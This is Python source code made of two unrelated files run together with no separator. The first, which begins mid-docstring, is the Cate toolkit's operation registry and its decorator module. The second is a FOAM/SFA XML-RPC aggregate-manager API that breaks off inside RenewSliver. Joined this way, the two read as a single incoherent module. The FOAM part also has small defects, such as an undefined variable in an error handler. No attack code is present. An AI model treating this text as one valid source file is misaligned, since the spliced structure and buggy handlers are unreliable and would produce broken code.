`test/test_op.py <https://github.com/CCI-Tools/cate/blob/master/test/test_op.py>`_ and may be executed using
``$ py.test test/test_op.py --cov=cate/core/plugin.py`` for extra code coverage information.
Components
==========
"""
import sys
from collections import OrderedDict
from typing import Union, Callable, Optional, Dict
import xarray as xr
from .types import ValidationError
from ..util.opmetainf import OpMetaInfo
from ..util.monitor import Monitor
from ..util.undefined import UNDEFINED
from ..util.safe import safe_eval
from ..util.process import run_subprocess, ProcessOutputMonitor
from ..util.tmpfile import new_temp_file, del_temp_file
from ..util.misc import object_to_qualified_name
from ..version import __version__
__author__ = "Norman Fomferra (Brockmann Consult GmbH)"
_MONITOR = OpMetaInfo.MONITOR_INPUT_NAME
_RETURN = OpMetaInfo.RETURN_OUTPUT_NAME
class Operation:
"""
An Operation comprises a wrapped callable (e.g. function, constructor, lambda form)
and additional meta-information about the wrapped operation itself and its inputs and outputs.
:param wrapped_op: some callable object that will be wrapped.
:param op_meta_info: operation meta information.
"""
def __init__(self, wrapped_op: Callable, op_meta_info=None):
if wrapped_op is None:
raise ValueError('wrapped_op must be given')
if not callable(wrapped_op):
raise ValueError('wrapped_op must be callable')
if op_meta_info is None:
# Try unwrapping wrapped_op
try:
# noinspection PyUnresolvedReferences
op_meta_info = wrapped_op.op_meta_info
try:
# noinspection PyUnresolvedReferences
wrapped_op = wrapped_op.wrapped_op
except AttributeError:
pass
except AttributeError:
pass
self._wrapped_op = wrapped_op
self._op_meta_info = op_meta_info or OpMetaInfo.introspect_operation(wrapped_op)
for attr_name in ['__module__', '__name__', '__qualname__', '__doc__', '__file__']:
try:
setattr(self, attr_name, getattr(wrapped_op, attr_name))
except AttributeError:
pass
@property
def op_meta_info(self) -> OpMetaInfo:
"""
:return: Meta-information about the operation, see :py:class:`cate.core.op.OpMetaInfo`.
"""
return self._op_meta_info
@property
def wrapped_op(self) -> Callable:
"""
:return: The actual operation object which may be any callable.
"""
return self._wrapped_op
def __str__(self):
return '%s: %s' % (self._wrapped_op, self._op_meta_info)
def __call__(self, *args, monitor: Monitor = Monitor.NONE, **kwargs):
"""
Perform this operation.
:param args: the arguments
:param monitor: an optional progress monitor, which is passed to the wrapped callable, if it supports it.
:param kwargs: the keyword arguments
:return: the operation output.
"""
input_values = kwargs
# process arguments, if any
num_args = len(args)
if num_args:
input_names = self.op_meta_info.input_names
for position in range(num_args):
if position >= len(input_names):
raise ValueError(
"too many inputs given for operation '{}'".format(self.op_meta_info.qualified_name))
input_name = self.op_meta_info.input_names[position]
input_values[input_name] = args[position]
# set default_value where input values are missing
self.op_meta_info.set_default_input_values(input_values)
# validate the input_values using this operation's meta-info
self.op_meta_info.validate_input_values(input_values, validation_exception_class=ValidationError)
if self.op_meta_info.has_monitor:
# set the monitor only if it is an argument
input_values[_MONITOR] = monitor
# call the callable
return_value = self._wrapped_op(**input_values)
if self.op_meta_info.has_named_outputs:
# return_value is expected to be a dictionary-like object
# set default_value where output values in return_value are missing
for name, properties in self.op_meta_info.outputs.items():
if name not in return_value or return_value[name] is None:
return_value[name] = properties.get('default_value')
# validate the return_value using this operation's meta-info
self.op_meta_info.validate_output_values(return_value)
# Add history information to outputs
for name, properties in self.op_meta_info.outputs.items():
add_history = properties.get('add_history')
if add_history:
return_value[name] = self._add_history(return_value[name], input_values)
else:
# return_value is a single value, not a dict
# set default_value if return_value is missing
properties = self.op_meta_info.outputs[_RETURN]
if return_value is None:
return_value = properties.get('default_value')
# validate the return_value using this operation's meta-info
self.op_meta_info.validate_output_values({_RETURN: return_value})
# Add history information to the output
add_history = properties.get('add_history')
if add_history:
return_value = self._add_history(return_value, input_values)
return return_value
def _add_history(self, ds: object, input_dict) -> object:
"""
Add provenance information about cate, the operation and its inputs to
the given output.
:return: Dataset with history information appended
"""
op_name = self.op_meta_info.qualified_name
# There can potentially be different ways to stamp an output depending
# on its type
if not isinstance(ds, xr.Dataset):
raise NotImplementedError('Operation "{}": Adding history information to an'
' output is currently implemented only'
' for outputs of type "xarray.Dataset".'.format(op_name))
# Construct our own dict to stringify, otherwise the full input dataset
# repr will be found in history.
input_str = dict()
for key in input_dict:
value = input_dict[key]
if isinstance(value, xr.Dataset):
# We only show that 'a dataset' was provided, instead of
# putting the full dataset repr in history
input_str[key] = type(value)
continue
input_str[key] = value
# Format the stamp
try:
op_version = self.op_meta_info.header['version']
except KeyError:
raise ValueError('Operation "{}": Could not add history information'
' because the "version" property is undefined.'.format(op_name))
stamp = '\nModified with Cate v' + __version__ + ' ' + \
op_name + ' v' + \
op_version + \
' \nDefault input values: ' + \
str(self.op_meta_info.inputs) + '\nProvided input values: ' + \
str(input_str) + '\n'
# Append the stamp to existing history information or create history
# attribute if none is found
if 'history' in ds.attrs:
if isinstance(ds.attrs['history'], str):
ds.attrs['history'] = ds.attrs['history'] + stamp
elif isinstance(ds.attrs['history'], list):
if isinstance(ds.attrs['history'][0], dict):
ds.attrs['history'][0]['program'] = ds.attrs['history'][0]['program'] + stamp
else:
ds.attrs['history'].append(stamp)
else:
ds.attrs['history'] = stamp
else:
ds.attrs['history'] = stamp
return ds
class OpRegistry:
"""
An operation registry allows for addition, removal, and retrieval of operations.
"""
def __init__(self):
self._op_registrations = OrderedDict()
@property
def op_registrations(self) -> OrderedDict:
"""
Get all operation registrations of type :py:class:`cate.core.op.Operation`.
:return: a mapping of fully qualified operation names to operation registrations
"""
return OrderedDict(sorted(self._op_registrations.items(), key=lambda item: item[0]))
def add_op(self, operation: Callable, fail_if_exists=True, replace_if_exists=False) -> Operation:
"""
Add a new operation registration.
:param operation: A operation object such as a class or any callable.
:param fail_if_exists: raise ``ValueError`` if the operation was already registered
:param replace_if_exists: replaces an existing operation if *fail_if_exists* is ``False``
:return: a new or existing :py:class:`cate.core.op.Operation`
"""
operation = self._unwrap_operation(operation)
op_key = self.get_op_key(operation)
if op_key in self._op_registrations:
if fail_if_exists:
raise ValueError("operation with name '%s' already registered" % op_key)
elif not replace_if_exists:
return self._op_registrations[op_key]
op_registration = Operation(operation)
self._op_registrations[op_key] = op_registration
return op_registration
def remove_op(self, operation: Callable, fail_if_not_exists=False) -> Optional[Operation]:
"""
Remove an operation registration.
:param operation: A fully qualified operation name or operation object such as a class or any callable.
:param fail_if_not_exists: raise ``ValueError`` if no such operation was found
:return: the removed :py:class:`cate.core.op.Operation` object or ``None``
if *fail_if_not_exists* is ``False``.
"""
operation = self._unwrap_operation(operation)
op_key = self.get_op_key(operation)
if op_key not in self._op_registrations:
if fail_if_not_exists:
raise ValueError("operation with name '%s' not registered" % op_key)
else:
return None
return self._op_registrations.pop(op_key)
def get_op(self, operation, fail_if_not_exists=False) -> Operation:
"""
Get an operation registration.
:param operation: A fully qualified operation name or operation object such as a class or any callable.
:param fail_if_not_exists: raise ``ValueError`` if no such operation was found
:return: a :py:class:`cate.core.op.Operation` object or ``None`` if *fail_if_not_exists* is ``False``.
"""
operation = self._unwrap_operation(operation)
op_key = self.get_op_key(operation)
op_registration = self._op_registrations.get(op_key, None)
if op_registration is None and fail_if_not_exists:
raise ValueError("operation with name '%s' not registered" % op_key)
return op_registration
# noinspection PyMethodMayBeStatic
def get_op_key(self, operation: Union[str, Callable]):
"""
Get a key under which the given operation will be registered.
:param operation: A fully qualified operation name or a callable object
:return: The operation key
"""
try:
qualified_name = operation.op_meta_info.qualified_name
except AttributeError:
if isinstance(operation, str):
qualified_name = operation
else:
operation = self._unwrap_operation(operation)
qualified_name = object_to_qualified_name(operation)
if qualified_name.startswith('cate.ops.'):
return qualified_name.rsplit('.', maxsplit=1)[1]
else:
return qualified_name
@classmethod
def _unwrap_operation(cls, operation):
if not operation:
raise ValueError('operation must be given')
try:
return operation.wrapped_op
except AttributeError:
return operation
class _DefaultOpRegistry(OpRegistry):
def __repr__(self):
return 'OP_REGISTRY'
# check (nf) - for more flexibility, REGISTRY may be configured by dependency injection
# see Python libs 'pinject' (Google), 'inject', and others
#: The default operation registry of type :py:class:`cate.core.op.OpRegistry`.
OP_REGISTRY = _DefaultOpRegistry()
def op(tags=UNDEFINED,
version=UNDEFINED,
res_pattern=UNDEFINED,
deprecated=UNDEFINED,
registry=OP_REGISTRY,
**properties):
"""
``op`` is a decorator function that registers a Python function or class in the default operation registry or
the one given by *registry*, if any.
Any other keyword arguments in *properties* are added to the operation's meta-information header.
Classes annotated by this decorator must have callable instances.
When a function is registered, an introspection is performed. During this process, the initial
meta-information header property *description* is derived from the function's docstring.
If any output of this operation will have its history information
automatically updated, there should be version information found in the
operation header. Thus it's always a good idea to add it to all operations::
@op(version='X.x')
:param tags: An optional list of string tags.
:param version: An optional version string.
:param res_pattern: An optional pattern that will be used to generate the names for data resources that are
used to hold a reference to the objects returned by the operation and that are cached in a Cate workspace.
Currently, the only pattern variable that is supported and that must be present is ``{index}`` which will
be replaced by an integer number that is guaranteed to produce a unique resource name.
:param deprecated: An optional boolean or a string. If a string is used, it should explain
why the operation has been deprecated and which new operation to use instead.
If set to ``True``, the operation's doc-string should explain the deprecation.
:param registry: The operation registry.
:param properties: Other properties (keyword arguments) that will be added to the meta-information of operation.
"""
def decorator(op_func):
new_properties = dict(tags=tags,
version=version,
res_pattern=res_pattern,
deprecated=deprecated,
**properties)
op_registration = registry.add_op(op_func, fail_if_exists=False)
op_registration.op_meta_info.header.update({k: v for k, v in new_properties.items() if v is not UNDEFINED})
return op_registration
return decorator
def op_input(input_name: str,
default_value=UNDEFINED,
units=UNDEFINED,
data_type=UNDEFINED,
nullable=UNDEFINED,
value_set_source=UNDEFINED,
value_set=UNDEFINED,
value_range=UNDEFINED,
script_lang=UNDEFINED,
deprecated=UNDEFINED,
position=UNDEFINED,
context=UNDEFINED,
registry=OP_REGISTRY,
**properties):
"""
``op_input`` is a decorator function that provides meta-information for an operation input identified by
*input_name*. If the decorated function or class is not registered as an operation yet, it is added to the default
operation registry or the one given by *registry*, if any.
When a function is registered, an introspection is performed. During this process, initial operation
meta-information input properties are derived for each positional and keyword argument named *input_name*:
================ ==============================================================================
Derived property Source
================ ==============================================================================
*position* The position of a positional argument, e.g. ``2`` for input ``z`` in
``def f(x, y, z, c=2)``.
*default_value* The value of a keyword argument, e.g. ``52.3`` for input ``latitude``
from argument definition ``latitude:float=52.3``
*data_type* The type annotation type, e.g. ``float`` for input ``latitude``
from argument definition ``latitude:float``
================ ==============================================================================
The derived properties listed above plus any of *value_set*, *value_range*, and any key-value pairs in *properties*
are added to the input's meta-information.
A key-value pair in *properties* will always overwrite the derived properties listed above.
:param input_name: The name of an input.
:param default_value: A default value.
:param units: The geo-physical units of the input value.
:param data_type: The data type of the input values.
If not given, the type of any given, non-None *default_value* is used.
:param nullable: If ``True``, the value of the input may be ``None``.
If not given, it will be set to ``True`` if the *default_value* is ``None``.
:param value_set_source: The name of an input, which can be used to generate a dynamic value set.
:param value_set: A sequence of the valid values. Note that all values in this sequence
must be compatible with *data_type*.
:param value_range: A sequence specifying the possible range of valid values.
:param script_lang: The programming language for a parameter of data_type "str" that provides source
code of a script, e.g. "python".
:param deprecated: An optional boolean or a string. If a string is used, it should explain
why the input has been deprecated and which new input to use instead.
If set to ``True``, the input's doc-string should explain the deprecation.
:param position: The zero-based position of an input.
:param context: If ``True``, the value of the operation input will be a dictionary representing
the current execution context. For example,
when the operation is executed from a workflow, the dictionary will hold at least three
entries: ``workflow`` provides the current workflow, ``step`` is the currently executed step,
and ``value_cache`` which is a mapping from step identifiers to step outputs. If *context* is a
string, the value of the operation input will be the result of evaluating the string as Python expression
with the current execution context as local environment. This means, *context* may be an expression
such as 'value_cache', 'workspace.base_dir', 'step', 'step.id'.
:param properties: Other properties (keyword arguments) that will be added to the
meta-information of the named output.
:param registry: Optional operation registry.
"""
def decorator(op_func):
op_registration = registry.add_op(op_func, fail_if_exists=False)
input_namespace = op_registration.op_meta_info.inputs
if input_name not in input_namespace:
input_namespace[input_name] = dict()
new_properties = dict(data_type=data_type,
default_value=default_value,
units=units,
nullable=nullable,
value_set_source=value_set_source,
value_set=value_set,
value_range=value_range,
script_lang=script_lang,
deprecated=deprecated,
position=position,
context=context,
**properties)
input_namespace[input_name].update({k: v for k, v in new_properties.items() if v is not UNDEFINED})
_adjust_input_properties(input_namespace[input_name])
return op_registration
return decorator
def op_output(output_name: str,
data_type=UNDEFINED,
deprecated=UNDEFINED,
registry=OP_REGISTRY,
**properties):
"""
``op_output`` is a decorator function that provides meta-information for an operation output identified by
*output_name*. If the decorated function or class is not registered as an operation yet, it is added to the default
operation registry or the one given by *registry*, if any.
If your function does not return multiple named outputs, use the :py:func:`op_return` decorator function.
Note that::
@op_return(...)
def my_func(...):
...
is equivalent to::
@op_output('return', ...)
def my_func(...):
...
To automatically add information about cate, its version, this operation
and its inputs, to this output, set 'add_history' to True::
@op_output('name', add_history=True)
Note that the operation should have version information added to it when
add_history is True::
@op(version='X.x')
:param output_name: The name of the output.
:param data_type: The data type of the output value.
:param deprecated: An optional boolean or a string. If a string is used, it should explain
why the output has been deprecated and which new output to use instead.
If set to ``True``, the output's doc-string should explain the deprecation.
:param properties: Other properties (keyword arguments) that
will be added to the meta-information of the named output.
:param registry: Optional operation registry.
"""
def decorator(op_func):
op_registration = registry.add_op(op_func, fail_if_exists=False)
output_namespace = op_registration.op_meta_info.outputs
if not op_registration.op_meta_info.has_named_outputs:
# if there is only one entry and it is the 'return' entry, rename it to value of output_name
output_properties = output_namespace[OpMetaInfo.RETURN_OUTPUT_NAME]
del output_namespace[OpMetaInfo.RETURN_OUTPUT_NAME]
output_namespace[output_name] = output_properties
elif output_name not in output_namespace:
output_namespace[output_name] = dict()
new_properties = dict(data_type=data_type, deprecated=deprecated, **properties)
output_namespace[output_name].update({k: v for k, v in new_properties.items() if v is not UNDEFINED})
return op_registration
return decorator
def op_return(data_type=UNDEFINED,
registry=OP_REGISTRY,
**properties):
"""
``op_return`` is a decorator function that provides meta-information for a single, anonymous operation return value
(whose output name is ``"return"``). If the decorated function or class is not registered as an operation yet,
it is added to the default operation registry or the one given by *registry*, if any.
Any other keyword arguments in *properties* are added to the output's meta-information.
When a function is registered, an introspection is performed. During this process, initial operation
meta-information output properties are derived from the function's return type annotation, that is
*data_type* will be e.g. ``float`` if a function is annotated as ``def f(x, y) -> float: ...``.
The derived *data_type* property and any key-value pairs in *properties* are added to the output's meta-information.
A key-value pair in *properties* will always overwrite a derived *data_type*.
If your function returns multiple named outputs, use the :py:func:`op_output` decorator function.
Note that::
@op_return(...)
def my_func(...):
...
is equivalent to::
@op_output('return', ...)
def my_func(...):
...
To automatically add information about cate, its version, this operation
and its inputs, to this output, set 'add_history' to True::
@op_return(add_history=True)
Note that the operation should have version information added to it when
add_history is True::
@op(version='X.x')
:param data_type: The data type of the return value.
:param properties: Other properties (keyword arguments)
that will be added to the meta-information of the return value.
:param registry: The operation registry.
"""
return op_output(OpMetaInfo.RETURN_OUTPUT_NAME,
data_type=data_type,
registry=registry,
**properties)
def _adjust_input_properties(input_properties):
"""Adjust any undefined input properties that can be derived from other defined input properties."""
default_value = input_properties.get('default_value', UNDEFINED)
# Derive undefined 'nullable' from 'default_value'
nullable = input_properties.get('nullable', UNDEFINED)
if nullable is UNDEFINED and default_value is None:
input_properties['nullable'] = True
# Derive undefined 'data_type' from 'default_value'
data_type = input_properties.get('data_type', UNDEFINED)
if data_type is UNDEFINED and not (default_value is UNDEFINED or default_value is None):
input_properties['data_type'] = type(default_value)
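# For example (illustrative): given only {'default_value': 0.5}, the helper above
# fills in data_type=float; given {'default_value': None}, it fills in nullable=True.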
def new_subprocess_op(op_meta_info: OpMetaInfo,
command_pattern: str,
run_python: bool = False,
cwd: Optional[str] = None,
env: Dict[str, str] = None,
shell: bool = False,
started: Union[str, Callable] = None,
progress: Union[str, Callable] = None,
done: Union[str, Callable] = None) -> Operation:
r"""
Create an operation for a child program run in a new process.
:param op_meta_info: Meta-information about the resulting operation and the operation's inputs and outputs.
:param command_pattern: A pattern that will be interpolated to obtain the actual command to be executed.
May contain "{input_name}" fields which will be replaced by the actual input value converted to text.
*input_name* must refer to a valid operation input name in *op_meta_info.inputs* or it must be
the value of either the "write_to" or "read_from" property of another input's property map.
:param run_python: If True, *command_pattern* refers to a Python script which will be executed with
the Python interpreter that Cate uses.
:param cwd: Current working directory to run the command line in.
:param env: Environment variables passed to the shell that executes the command line.
:param shell: Whether to use the shell as the program to execute.
:param started: Either a callable that receives a text line from the executable's stdout
and returns a tuple (label, total_work) or a regex that must match
in order to signal the start of progress monitoring.
The regex must provide the group names "label" or "total_work" or both,
e.g. "(?P<label>\w+)" or "(?P<total_work>\d+)"
:param progress: Either a callable that receives a text line from the executable's stdout
and returns a tuple (work, msg) or a regex that must match
in order to signal progress.
The regex must provide group names "work" or "msg" or both,
e.g. "(?P<msg>\w+)" or "(?P<work>\d+)"
:param done: Either a callable that receives a text line from the executable's stdout
and returns True or False or a regex that must match
in order to signal the end of progress monitoring.
:return: The executable wrapped into an operation.
"""
if (started or progress) and not op_meta_info.has_monitor:
op_meta_info = OpMetaInfo(op_meta_info.qualified_name,
has_monitor=True,
inputs=op_meta_info.inputs,
outputs=op_meta_info.outputs,
header=op_meta_info.header)
# Idea: process special input properties:
# - "is_cwd" - an input that provides the current working directory, must be of type str
# - "is_env" - an input that provides environment variables, must be of type DictLike
# - "is_output" - an input that provides the file path of an output, must be of type str
def run_executable(**kwargs):
format_kwargs = {}
temp_input_files = {}
temp_output_files = {}
for name, props in op_meta_info.inputs.items():
value = kwargs.get(name, props.get('default_value', UNDEFINED))
if value is not UNDEFINED:
if 'write_to' in props:
new_name = props['write_to']
_, file = new_temp_file(suffix='.nc')
value.to_netcdf(file)
format_kwargs[new_name] = file
temp_input_files[name] = file
else:
try:
value = value.format()
except AttributeError:
pass
format_kwargs[name] = value
for name, props in op_meta_info.outputs.items():
if 'read_from' in props:
new_name = props['read_from']
_, file = new_temp_file(suffix='.nc')
format_kwargs[new_name] = file
temp_output_files[name] = file
monitor = None
if _MONITOR in format_kwargs:
monitor = format_kwargs.pop(_MONITOR)
command = command_pattern.format(**format_kwargs)
stdout_handler = None
if monitor:
stdout_handler = ProcessOutputMonitor(monitor,
label=command,
started=started, progress=progress, done=done)
if run_python:
command = '"{}" {}'.format(sys.executable, command)
exit_code = run_subprocess(command,
cwd=cwd, env=env, shell=shell,
stdout_handler=stdout_handler,
is_cancelled=monitor.is_cancelled if monitor else None)
for file in temp_input_files.values():
del_temp_file(file)
return_value = {}
for name, file in temp_output_files.items():
return_value[name] = xr.open_dataset(file)
if not return_value:
# No output specified, so we return exit code
return exit_code
if exit_code:
# There is output specified, but exit code signals error
raise ValueError('command [{}] exited with code {}'.format(command_pattern, exit_code))
if len(return_value) == 1 and 'return' in return_value:
# Single output
return return_value['return']
else:
# Multiple outputs
return return_value
run_executable.__name__ = op_meta_info.qualified_name
run_executable.__doc__ = op_meta_info.header.get('description')
return Operation(run_executable, op_meta_info=op_meta_info)
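# A minimal usage sketch for new_subprocess_op (illustrative only; the tool name,
# operation name, inputs and regex below are hypothetical, not part of this module).
# The "{ds_file}", "{res}" and "{out_file}" fields are interpolated from the inputs:
# 'ds' is written to a temporary NetCDF file, and the 'return' output is read back
# from the file path substituted for "{out_file}".
def _example_subprocess_op():
    meta = OpMetaInfo('examples.resample',
                      inputs={'ds': {'write_to': 'ds_file'},
                              'res': {'data_type': float}},
                      outputs={'return': {'read_from': 'out_file'}})
    return new_subprocess_op(meta,
                             'resample-tool --in {ds_file} --res {res} --out {out_file}',
                             progress='step (?P<work>\\d+)')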
def new_expression_op(op_meta_info: OpMetaInfo, expression: str) -> Operation:
"""
Create an operation that wraps a Python expression.
:param op_meta_info: Meta-information about the resulting operation and the operation's inputs and outputs.
:param expression: The Python expression. May refer to any name given in *op_meta_info.input*.
:return: The Python expression wrapped into an operation.
"""
if not op_meta_info:
raise ValueError('op_meta_info must be given')
if not expression:
raise ValueError('expression must be given')
def eval_expression(**kwargs):
return safe_eval(expression, local_namespace=kwargs)
inputs = OrderedDict(op_meta_info.inputs)
outputs = OrderedDict(op_meta_info.outputs)
if len(outputs) == 0:
outputs[_RETURN] = {}
op_meta_info = OpMetaInfo(op_meta_info.qualified_name,
has_monitor=op_meta_info.has_monitor,
header=dict(op_meta_info.header),
inputs=inputs,
outputs=outputs)
eval_expression.__name__ = op_meta_info.qualified_name
eval_expression.__doc__ = op_meta_info.header.get('description')
return Operation(eval_expression, op_meta_info=op_meta_info)
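# A minimal usage sketch for new_expression_op (illustrative; the operation name and
# inputs are hypothetical). The resulting operation evaluates "x * factor" against the
# keyword arguments it is called with, e.g. op(x=2, factor=10).
def _example_expression_op():
    meta = OpMetaInfo('examples.scale', inputs={'x': {}, 'factor': {}})
    return new_expression_op(meta, 'x * factor')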
|
|
import os
import sys
import random
#legacy optin imports
#from foam.ethzlegacyoptinstuff.legacyoptin.xmlrpcmodels import CallBackServerProxy, FVServerProxy
from foam.ethzlegacyoptinstuff.legacyoptin.optsmodels import Experiment, ExperimentFLowSpace #,\
#UserOpts, OptsFlowSpace, MatchStruct
from foam.ethzlegacyoptinstuff.legacyoptin.flowspaceutils import dotted_ip_to_int, mac_to_int,\
int_to_dotted_ip, int_to_mac, parseFVexception
#foam general imports
import logging
import zlib
import base64
import xmlrpclib
from xml.parsers.expat import ExpatError
import jsonrpc
from flaskext.xmlrpc import XMLRPCHandler, Fault
from flask import request
import foam.task
import foam.lib
import foam.api.xmlrpc
import foam.version
from foam.creds import CredVerifier, Certificate
from foam.config import AUTO_SLIVER_PRIORITY, GAPI_REPORTFOAMVERSION
from foam.core.configdb import ConfigDB
from foam.core.log import KeyAdapter
#GENI API imports
from foam.geni.db import GeniDB, UnknownSlice, UnknownNode
import foam.geni.approval
import foam.geni.ofeliaapproval
import foam.geni.lib
import sfa
from sfa.util.xrn import Xrn
#FV import
from foam.flowvisor import Connection as FV
from pprint import pprint
import json
import httplib,urllib,base64
THIS_SITE_TAG = ConfigDB.getConfigItemByKey("geni.site-tag").getValue()
from foam.geni.codes import GENI_ERROR_CODE
from foam.ethzlegacyoptinstuff.api_exp_to_rspecv3.expdatatogeniv3rspec import create_ofv3_rspec
from foam.sfa.drivers.OFSfaDriver import OFSfaDriver
from foam.sfa.sfa_config import config as CONFIG
from foam.sfa.methods.permission_manager import PermissionManager
from foam.sfa.lib import get_slice_details_from_slivers, getAdvertisement
def _same(val):
return "%s" % val
class SfaApi(foam.api.xmlrpc.Dispatcher):
def __init__ (self, log):
super(SfaApi, self).__init__("sfaapi", log)
self._actionLog = KeyAdapter("expedient-sfa", logging.getLogger('sfaapi-actions'))
#retrieve updated dict as a json file from foam db folder
filedir = './opt/ofelia/ofam/local/db'
filename = os.path.join(filedir, 'expedient_slices_info.json')
if os.path.isfile(filename):
f = open(filename, 'r')
self.slice_info_dict = json.load(f)
f.close()
else:
self.slice_info_dict = {}
#if ConfigDB.getConfigItemByKey("flowvisor.hostname").getValue() is None:
self.switch_dpid_list = None
self.link_list = None
self.callback_http_attr_list = [] #we have multiple expedients communicating with foam!
self.callback_cred_attr_list = [] #we have multiple expedients communicating with foam!
self.driver = OFSfaDriver()
self.pm = PermissionManager()
def pub_GetVersion(self,api=None,options={}):
#FIXME: SFA does not seem to accept the GENI error structure when exceptions are raised.
version = {'urn':CONFIG.URN,
'hostname':CONFIG.HOSTNAME,
'code_tag':CONFIG.CODE_TAG,
'hrn':CONFIG.HRN,
'testbed':CONFIG.TESTBED,
'geni_api_versions': CONFIG.GENI_API_VERSIONS,
'interface':CONFIG.INTERFACE,
'geni_api':int(CONFIG.GENI_API_VERSION),
'geni_ad_rspec_versions': CONFIG.GENI_AD_RSPEC_VERSIONS,
'code_url': CONFIG.CODE_URL,
'geni_request_rspec_versions': CONFIG.GENI_REQUEST_RSPEC_VERSIONS,
'sfa':int(CONFIG.SFA_VERSION),
#F4F required params
'f4f_describe_testbed':CONFIG.DESCRIBE_TESTBED,
'f4f_testbed_homepage':CONFIG.TESTBED_HOMEPAGE,
'f4f_testbed_picture':CONFIG.TESTBED_PICTURE,
'f4f_endorsed_tools':CONFIG.ENDORSED_TOOLS,
}
return self.buildPropertyList(GENI_ERROR_CODE.SUCCESS, value=version)
def pub_ListResources(self,creds=[],options={}):
self.pm.check_permissions('ListResources',locals())
slice_xrn = options.get('geni_slice_urn', None)
propertyList = None
if slice_xrn:
xrn = Xrn(slice_xrn,'slice')
slice_urn = xrn.get_urn()
slice_leaf = xrn.get_leaf()
options['slice'] = slice_leaf
else:
slice_leaf = None
slice_urn = None
try:
rspec = self.driver.list_resources(slice_urn,slice_leaf,options)
if options.has_key('geni_compressed') and options['geni_compressed'] == True:
rspec = zlib.compress(rspec).encode('base64')
propertyList = self.buildPropertyList(GENI_ERROR_CODE.SUCCESS, value=rspec)
except ExpatError:
msg = "Error parsing credential strings"
propertyList = self.buildPropertyList(GENI_ERROR_CODE.BADARGS, output=msg)
self._log.error(msg)
except UnknownSlice as x:
# Raised by GeniDB.getSliverURN()
msg = "Attempt to list resources on sliver for unknown slice %s" % (urn)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
x.log(self._log, msg, logging.INFO)
except xmlrpclib.Fault as x:
# Something thrown via GCF, we'll presume it was something related to credentials
msg = "GCF credential check failure: <%s>" % (x)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
self._log.info(msg)
self._log.debug(x, exc_info=True)
except AttributeError as x:
# New GCF problem with user creds that have no gid_caller, probably
msg = "GCF credential check failure: <%s>" % (x)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
self._log.info(msg)
self._log.debug(x, exc_info=True)
except Exception as e:
msg = "Exception: %s" % str(e)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
self._log.exception(msg)
self._log.info(propertyList)
return propertyList
def pub_CreateSliver(self, slice_xrn, creds, rspec, users, options):
"""Allocate resources to a slice
Reserve the resources described in the given RSpec for the given slice, returning a manifest RSpec of what has been reserved.
"""
try:
self.pm.check_permissions('CreateSliver',locals())
except Exception as e:
return self.buildPropertyList(GENI_ERROR_CODE.CREDENTIAL_INVALID, output=e)
self.recordAction("createsliver", creds, slice_xrn)
user_info = {}
user_info["urn"] = None
user_info["email"] = None
request.environ.pop("CLIENT_RAW_CERT",None)
sliver = foam.geni.lib.createSliver(slice_xrn, creds, rspec, user_info)
try:
approve = foam.geni.approval.analyzeForApproval(sliver)
style = ConfigDB.getConfigItemByKey("geni.approval.approve-on-creation").getValue()
if style == foam.geni.approval.NEVER:
approve = False
elif style == foam.geni.approval.ALWAYS:
approve = True
if approve:
pid = foam.task.approveSliver(sliver.getURN(), self._auto_priority)
data = GeniDB.getSliverData(sliver.getURN(), True)
#foam.task.emailCreateSliver(data)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.SUCCESS, value=GeniDB.getManifest(sliver.getURN()))
except foam.geni.lib.RspecParseError as e:
msg = str(e)
self._log.info(e)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.BADARGS, output=msg)
except foam.geni.lib.RspecValidationError as e:
self._log.info(e)
msg = str(e)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.BADARGS, output=msg)
except foam.geni.lib.DuplicateSliver as ds:
msg = "Attempt to create multiple slivers for slice [%s]" % (ds.slice_urn)
self._log.info(msg)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
except foam.geni.lib.UnknownComponentManagerID as ucm:
msg = "Component Manager ID specified in %s does not match this aggregate." % (ucm.cid)
self._log.info(msg)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
except (foam.geni.lib.UnmanagedComponent, UnknownNode) as uc:
msg = "DPID in component %s is unknown to this aggregate." % (uc.cid)
self._log.info(msg)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
except Exception as e:
msg = "Exception %s" % str(e)
self._log.info(e)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
finally:
return propertyList
def pub_DeleteSliver(self, xrn, creds, options={}):
"""Delete a sliver
Stop all the slice's resources and remove the reservation.
Returns True or False indicating whether it did this successfully.
"""
try:
self.pm.check_permissions('DeleteSliver',locals())
except Exception as e:
return self.buildPropertyList(GENI_ERROR_CODE.CREDENTIAL_INVALID, output=e)
self._log.info("Is HERE:")
try:
slivers = GeniDB.getSliverList()
self._log.info("Is HERE:")
sliver = get_slice_details_from_slivers(slivers, xrn)
self._log.info("Deleteing Sliver")
self._log.info(sliver["slice_urn"])
data = GeniDB.getSliverData(sliver["sliver_urn"], True)
foam.geni.lib.deleteSliver(sliver_urn = sliver["sliver_urn"])
#foam.task.emailGAPIDeleteSliver(data)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.SUCCESS, value=True)
except UnknownSlice as e:
msg = "Attempt to delete sliver for unknown slice %s" % (xrn)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.SEARCHFAILED, output=msg)
except Exception as e:
msg = "Exception: %s" % str(e)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
finally:
return propertyList
def pub_RenewSliver(self,slice_xrn=None, creds=[], expiration_time=None, options={}):
try:
self.pm.check_permissions('Start',locals())
except Exception as e:
return self.buildPropertyList(GENI_ERROR_CODE.CREDENTIAL_INVALID, output=e)
try:
sliver_urn = foam.lib.renewSliver(slice_xrn, creds, expiration_time)
data = GeniDB.getSliverData(sliver_urn, True)
#foam.task.emailRenewSliver(data)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.SUCCESS, value=True)
except foam.lib.BadSliverExpiration as e:
msg = "Bad expiration request: %s" % (e.msg)
propertyList = self.buildPropertyList(GENI_ERROR_CODE.ERROR, output=msg)
e.log(self._log, msg, logging.INFO)
